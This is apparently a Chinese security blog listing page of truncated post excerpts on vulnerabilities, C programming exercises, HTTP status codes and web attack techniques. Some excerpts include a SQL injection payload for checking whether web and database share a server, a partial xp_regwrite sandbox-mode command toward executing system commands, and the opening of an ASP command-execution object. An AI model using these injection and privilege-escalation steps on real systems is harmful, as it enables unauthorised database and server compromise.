#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#pragma comment(lib,”ws2_32.lib”)
#define HTTP_PORT 80
#define HTTP_BUF_SIZE 1024
#define NAME_SIZE 1024
#define P…
-
-
漏洞是两个月前公开的,网上相对于这个漏洞的介绍比较少,不过有一篇文章写得挺好。原文链接:http://bbs.pediy.com/showthread.php?t=158309
1. 漏洞的基本情况
北卡罗莱纳州立大学蒋旭宪教授领导的团队日前发文称Android系统所有版本中存在安全漏洞[1],任何应用软件不需要任何权限(包括不需要读写短信的权限),都…
-
见了一个比较有意思的C程序设计题目:
从键盘输入一个整数(1~20)
则以该数字为矩阵的大小,把1,2,3…n*n 的数字按照顺时针螺旋的形式填入其中。例如:
输入数字2,则程序输出:
1 2
4 3
输入数字3,则程序输出:
1 2 3
8 9 4
7 6 5
输入数字4,则程序输出:
1 2 3&nbs… -
-
HTTP 400 – 请求无效
HTTP 401.1 – 未授权:登录失败
HTTP 401.2 – 未授权:服务器配置问题导致登录失败
HTTP 401.3 – ACL 禁止访问资源
HTTP 401.4 – 未授权:授权被筛选器拒绝
HTTP 401.5 – 未授权:ISAPI 或 CGI 授权失败HTTP 403 – 禁止访问
HTTP 403 – 对 Internet 服务管理… -
作者:云舒
转自:http://www.haiyangtop.net/safety/book/show.asp?id=3880前几天刺在我们的maillist发了一个老外写的文章,大意是可以用php来实现数据的劫持和转发。我瞄了一下,确实可行,于是今天抽出了以前用来扯淡的时间,写了段代码验证了一下想法。老外的原文是一个PDF,有兴趣看的可以看看。地址是在:http://www.secforce.co…
-
转自:小默的博客
and exists(select * from admin where 1=(Select (case when host_name()
=@@servername then 1 else 0 end)))加在注入点后面,如果返回正常说明web和数据库是同一服务器,如果不正常责说明是分离的.
注意admin是数据库存在的一个表,自己找吧. -
众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术。同时SQL注入攻击所带来的安全破坏也是不可弥补的。以下罗列的10款SQL工具可帮助管理员及时检测存在的漏洞。
BSQL Hacker
BSQL Hacker是由Portcullis实验室开发的,BSQL Hacker 是一个SQL自动注入工具(支持SQL盲注),其设计的目的是希望能对任何的数据库进行SQL溢出注入。 BSQL Hacker…
-
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法,成功率为五五之数。
把下面代码复制:
<object runat=server id=oScriptlhn scope=page classid=”clsid:72C24DD5-D70A-438B-… -
以下方法都以需要SA权限为前提。
1, 沙盒模式的变通.
原始方法:第一句开启沙盘模式:exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
第二句利用jet.oledb执行系统命令:select * from o…